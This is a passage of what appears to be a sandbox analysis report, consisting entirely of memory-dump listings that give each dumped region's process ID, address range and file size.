memory/3984-891-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/4004-246-0x0000000005890000-0x00000000058C8000-memory.dmpFilesize
224KB
-
memory/4004-208-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/4004-202-0x0000000000000000-mapping.dmp
-
memory/4004-211-0x0000000000AA0000-0x0000000000AA1000-memory.dmpFilesize
4KB
-
memory/4088-33-0x0000000004220000-0x0000000004221000-memory.dmpFilesize
4KB
-
memory/4088-25-0x0000000000000000-mapping.dmp
-
memory/4088-31-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/4112-812-0x0000000000000000-mapping.dmp
-
memory/4120-739-0x0000000000000000-mapping.dmp
-
memory/4124-204-0x0000000000000000-mapping.dmp
-
memory/4136-264-0x0000000000000000-mapping.dmp
-
memory/4164-225-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/4164-222-0x000000000040C76E-mapping.dmp
-
memory/4164-221-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4180-344-0x00000000049B0000-0x0000000004A02000-memory.dmpFilesize
328KB
-
memory/4180-280-0x0000000002120000-0x0000000002130000-memory.dmpFilesize
64KB
-
memory/4180-194-0x0000000000000000-mapping.dmp
-
memory/4180-769-0x0000000010530000-0x000000001054B000-memory.dmpFilesize
108KB
-
memory/4180-712-0x0000000050480000-0x000000005049A000-memory.dmpFilesize
104KB
-
memory/4208-306-0x0000000000000000-mapping.dmp
-
memory/4208-315-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/4272-148-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4272-154-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4272-151-0x000000000043FA56-mapping.dmp
-
memory/4320-849-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/4320-846-0x0000000000000000-mapping.dmp
-
memory/4340-302-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/4340-295-0x0000000000000000-mapping.dmp
-
memory/4360-656-0x0000000000000000-mapping.dmp
-
memory/4360-660-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/4384-895-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/4384-890-0x0000000000000000-mapping.dmp
-
memory/4392-749-0x0000000000000000-mapping.dmp
-
memory/4468-140-0x0000000000000000-mapping.dmp
-
memory/4476-142-0x0000000000000000-mapping.dmp
-
memory/4560-834-0x0000000000000000-mapping.dmp
-
memory/4580-298-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/4580-293-0x0000000000000000-mapping.dmp
-
memory/4616-848-0x0000000000000000-mapping.dmp
-
memory/4616-851-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/4640-813-0x000001F0CB6A0000-0x000001F0CB6A1000-memory.dmpFilesize
4KB
-
memory/4652-158-0x000000000041A684-mapping.dmp
-
memory/4652-160-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4652-157-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4660-357-0x000002B41A930000-0x000002B41A931000-memory.dmpFilesize
4KB
-
memory/4660-371-0x000002B41A3B0000-0x000002B41A3B1000-memory.dmpFilesize
4KB
-
memory/4660-313-0x0000000000000000-mapping.dmp
-
memory/4660-356-0x000002B41A380000-0x000002B41A381000-memory.dmpFilesize
4KB
-
memory/4660-321-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/4668-161-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/4668-162-0x0000000000417A8B-mapping.dmp
-
memory/4668-164-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/4776-688-0x0000000000000000-mapping.dmp
-
memory/4776-692-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/4780-281-0x000002E0F7880000-0x000002E0F7881000-memory.dmpFilesize
4KB
-
memory/4780-276-0x0000000000000000-mapping.dmp
-
memory/4780-278-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/4780-279-0x000002E0F76D0000-0x000002E0F76D1000-memory.dmpFilesize
4KB
-
memory/4788-185-0x0000000000000000-mapping.dmp
-
memory/4876-294-0x0000000000000000-mapping.dmp
-
memory/4876-300-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/4908-819-0x0000000000000000-mapping.dmp
-
memory/4924-273-0x0000000000A30000-0x0000000000A31000-memory.dmpFilesize
4KB
-
memory/4924-272-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/4924-268-0x0000000000000000-mapping.dmp
-
memory/4924-269-0x0000000000000000-mapping.dmp
-
memory/4980-327-0x0000000000000000-mapping.dmp
-
memory/4980-333-0x00007FF99F9C0000-0x00007FF9A03AC000-memory.dmpFilesize
9.9MB
-
memory/5020-736-0x0000000000000000-mapping.dmp
-
memory/5024-113-0x0000000000000000-mapping.dmp
-
memory/5044-741-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/5044-742-0x0000000000417A8B-mapping.dmp
-
memory/5044-744-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/5104-124-0x0000000000000000-mapping.dmp
-
memory/5116-141-0x000000000A730000-0x000000000A731000-memory.dmpFilesize
4KB
-
memory/5116-350-0x00000000054B0000-0x00000000054B1000-memory.dmpFilesize
4KB
-
memory/5116-349-0x0000000005350000-0x000000000540A000-memory.dmpFilesize
744KB
-
memory/5116-149-0x000000000CEA0000-0x000000000CEA1000-memory.dmpFilesize
4KB
-
memory/5116-137-0x00000000075A0000-0x0000000007668000-memory.dmpFilesize
800KB
-
memory/5116-135-0x0000000000750000-0x0000000000751000-memory.dmpFilesize
4KB
-
memory/5116-139-0x0000000005290000-0x0000000005291000-memory.dmpFilesize
4KB
-
memory/5116-131-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/5116-125-0x0000000000000000-mapping.dmp
-
memory/5116-156-0x000000000CA40000-0x000000000CA54000-memory.dmpFilesize
80KB
-
memory/5280-466-0x0000000000000000-mapping.dmp
-
memory/5280-521-0x0000000000000000-mapping.dmp
-
memory/5280-654-0x0000000000000000-mapping.dmp
-
memory/5280-651-0x0000000000000000-mapping.dmp
-
memory/5280-649-0x0000000000000000-mapping.dmp
-
memory/5280-662-0x0000000000000000-mapping.dmp
-
memory/5280-646-0x0000000000000000-mapping.dmp
-
memory/5280-667-0x0000000000000000-mapping.dmp
-
memory/5280-669-0x0000000000000000-mapping.dmp
-
memory/5280-671-0x0000000000000000-mapping.dmp
-
memory/5280-673-0x0000000000000000-mapping.dmp
-
memory/5280-675-0x0000000000000000-mapping.dmp
-
memory/5280-644-0x0000000000000000-mapping.dmp
-
memory/5280-642-0x0000000000000000-mapping.dmp
-
memory/5280-677-0x0000000000000000-mapping.dmp
-
memory/5280-682-0x0000000000000000-mapping.dmp
-
memory/5280-684-0x0000000000000000-mapping.dmp
-
memory/5280-686-0x0000000000000000-mapping.dmp
-
memory/5280-689-0x0000000000000000-mapping.dmp
-
memory/5280-639-0x0000000000000000-mapping.dmp
-
memory/5280-636-0x0000000000000000-mapping.dmp
-
memory/5280-633-0x0000000000000000-mapping.dmp
-
memory/5280-631-0x0000000000000000-mapping.dmp
-
memory/5280-694-0x0000000000000000-mapping.dmp
-
memory/5280-626-0x0000000000000000-mapping.dmp
-
memory/5280-699-0x0000000000000000-mapping.dmp
-
memory/5280-703-0x0000000000000000-mapping.dmp
-
memory/5280-708-0x0000000000000000-mapping.dmp
-
memory/5280-623-0x0000000000000000-mapping.dmp
-
memory/5280-716-0x0000000006AF0000-0x0000000006AF1000-memory.dmpFilesize
4KB
-
memory/5280-717-0x0000000000000000-mapping.dmp
-
memory/5280-373-0x0000000000000000-mapping.dmp
-
memory/5280-370-0x00000000004E0000-0x00000000004E1000-memory.dmpFilesize
4KB
-
memory/5280-374-0x00000000005A0000-0x00000000005A1000-memory.dmpFilesize
4KB
-
memory/5280-379-0x0000000000000000-mapping.dmp
-
memory/5280-621-0x0000000000000000-mapping.dmp
-
memory/5280-619-0x0000000000000000-mapping.dmp
-
memory/5280-617-0x0000000000000000-mapping.dmp
-
memory/5280-613-0x0000000000000000-mapping.dmp
-
memory/5280-608-0x0000000000000000-mapping.dmp
-
memory/5280-601-0x0000000000000000-mapping.dmp
-
memory/5280-599-0x0000000000000000-mapping.dmp
-
memory/5280-597-0x0000000000000000-mapping.dmp
-
memory/5280-595-0x0000000000000000-mapping.dmp
-
memory/5280-385-0x0000000000000000-mapping.dmp
-
memory/5280-593-0x0000000000000000-mapping.dmp
-
memory/5280-591-0x0000000000000000-mapping.dmp
-
memory/5280-588-0x0000000000000000-mapping.dmp
-
memory/5280-586-0x0000000000000000-mapping.dmp
-
memory/5280-584-0x0000000000000000-mapping.dmp
-
memory/5280-582-0x0000000000000000-mapping.dmp
-
memory/5280-580-0x0000000000000000-mapping.dmp
-
memory/5280-578-0x0000000000000000-mapping.dmp
-
memory/5280-576-0x0000000000000000-mapping.dmp
-
memory/5280-574-0x0000000000000000-mapping.dmp
-
memory/5280-572-0x0000000000000000-mapping.dmp
-
memory/5280-570-0x0000000000000000-mapping.dmp
-
memory/5280-568-0x0000000000000000-mapping.dmp
-
memory/5280-566-0x0000000000000000-mapping.dmp
-
memory/5280-564-0x0000000000000000-mapping.dmp
-
memory/5280-562-0x0000000000000000-mapping.dmp
-
memory/5280-560-0x0000000000000000-mapping.dmp
-
memory/5280-558-0x0000000000000000-mapping.dmp
-
memory/5280-556-0x0000000000000000-mapping.dmp
-
memory/5280-554-0x0000000000000000-mapping.dmp
-
memory/5280-552-0x0000000000000000-mapping.dmp
-
memory/5280-550-0x0000000000000000-mapping.dmp
-
memory/5280-389-0x0000000000000000-mapping.dmp
-
memory/5280-392-0x0000000000000000-mapping.dmp
-
memory/5280-544-0x0000000000000000-mapping.dmp
-
memory/5280-541-0x0000000000000000-mapping.dmp
-
memory/5280-533-0x0000000000000000-mapping.dmp
-
memory/5280-531-0x0000000000000000-mapping.dmp
-
memory/5280-529-0x0000000000000000-mapping.dmp
-
memory/5280-527-0x0000000000000000-mapping.dmp
-
memory/5280-525-0x0000000000000000-mapping.dmp
-
memory/5280-523-0x0000000000000000-mapping.dmp
-
memory/5280-657-0x0000000000000000-mapping.dmp
-
memory/5280-519-0x0000000000000000-mapping.dmp
-
memory/5280-517-0x0000000000000000-mapping.dmp
-
memory/5280-515-0x0000000000000000-mapping.dmp
-
memory/5280-513-0x0000000000000000-mapping.dmp
-
memory/5280-511-0x0000000000000000-mapping.dmp
-
memory/5280-396-0x0000000000000000-mapping.dmp
-
memory/5280-509-0x0000000000000000-mapping.dmp
-
memory/5280-507-0x0000000000000000-mapping.dmp
-
memory/5280-505-0x0000000000000000-mapping.dmp
-
memory/5280-503-0x0000000000000000-mapping.dmp
-
memory/5280-501-0x0000000000000000-mapping.dmp
-
memory/5280-499-0x0000000000000000-mapping.dmp
-
memory/5280-402-0x0000000000000000-mapping.dmp
-
memory/5280-497-0x0000000000000000-mapping.dmp
-
memory/5280-495-0x0000000000000000-mapping.dmp
-
memory/5280-493-0x0000000000000000-mapping.dmp
-
memory/5280-491-0x0000000000000000-mapping.dmp
-
memory/5280-489-0x0000000000000000-mapping.dmp
-
memory/5280-406-0x0000000000000000-mapping.dmp
-
memory/5280-487-0x0000000000000000-mapping.dmp
-
memory/5280-412-0x0000000000000000-mapping.dmp
-
memory/5280-485-0x0000000000000000-mapping.dmp
-
memory/5280-483-0x0000000000000000-mapping.dmp
-
memory/5280-481-0x0000000000000000-mapping.dmp
-
memory/5280-479-0x0000000000000000-mapping.dmp
-
memory/5280-477-0x0000000000000000-mapping.dmp
-
memory/5280-474-0x0000000000000000-mapping.dmp
-
memory/5280-472-0x0000000000000000-mapping.dmp
-
memory/5280-470-0x0000000000000000-mapping.dmp
-
memory/5280-416-0x0000000000000000-mapping.dmp
-
memory/5280-418-0x0000000000000000-mapping.dmp
-
memory/5280-468-0x0000000000000000-mapping.dmp
-
memory/5280-421-0x0000000000000000-mapping.dmp
-
memory/5280-464-0x0000000000000000-mapping.dmp
-
memory/5280-462-0x0000000000000000-mapping.dmp
-
memory/5280-458-0x0000000000000000-mapping.dmp
-
memory/5280-455-0x0000000000000000-mapping.dmp
-
memory/5280-453-0x0000000000000000-mapping.dmp
-
memory/5280-450-0x0000000000000000-mapping.dmp
-
memory/5280-448-0x0000000000000000-mapping.dmp
-
memory/5280-446-0x0000000000000000-mapping.dmp
-
memory/5280-443-0x0000000000000000-mapping.dmp
-
memory/5280-441-0x0000000000000000-mapping.dmp
-
memory/5280-439-0x0000000000000000-mapping.dmp
-
memory/5280-437-0x0000000000000000-mapping.dmp
-
memory/5280-435-0x0000000000000000-mapping.dmp
-
memory/5280-433-0x0000000000000000-mapping.dmp
-
memory/5280-424-0x0000000000000000-mapping.dmp
-
memory/5280-427-0x0000000000000000-mapping.dmp
-
memory/5472-809-0x0000000004B40000-0x0000000004B41000-memory.dmpFilesize
4KB
-
memory/5472-806-0x0000000000000000-mapping.dmp
-
memory/5500-372-0x0000000000000000-mapping.dmp
-
memory/5500-377-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/5500-386-0x00000000008A0000-0x00000000008A1000-memory.dmpFilesize
4KB
-
memory/5500-546-0x00000000059B0000-0x00000000059F7000-memory.dmpFilesize
284KB
-
memory/5500-399-0x0000000005260000-0x00000000052B2000-memory.dmpFilesize
328KB
-
memory/5520-382-0x0000000000400000-0x0000000000493000-memory.dmpFilesize
588KB
-
memory/5520-380-0x000000000043FA56-mapping.dmp
-
memory/5520-378-0x0000000000400000-0x0000000000493000-memory.dmpFilesize
588KB
-
memory/5584-710-0x0000000000000000-mapping.dmp
-
memory/5624-856-0x0000000000000000-mapping.dmp
-
memory/5624-859-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/5868-678-0x0000000000000000-mapping.dmp
-
memory/5868-707-0x0000000002260000-0x0000000002270000-memory.dmpFilesize
64KB
-
memory/5868-760-0x0000000004850000-0x00000000048A2000-memory.dmpFilesize
328KB
-
memory/5876-864-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/5876-858-0x0000000000000000-mapping.dmp
-
memory/5916-855-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/5916-852-0x0000000000000000-mapping.dmp
-
memory/6000-715-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/6000-709-0x0000000000000000-mapping.dmp
-
memory/6040-792-0x0000000070220000-0x000000007090E000-memory.dmpFilesize
6.9MB
-
memory/6040-788-0x0000000000403BEE-mapping.dmp
-
memory/6092-831-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB
-
memory/6092-828-0x0000000000000000-mapping.dmp
-
memory/6092-827-0x0000000000000000-mapping.dmp
-
memory/6140-867-0x0000000000000000-mapping.dmp
-
memory/6140-871-0x00007FF9A2F40000-0x00007FF9A392C000-memory.dmpFilesize
9.9MB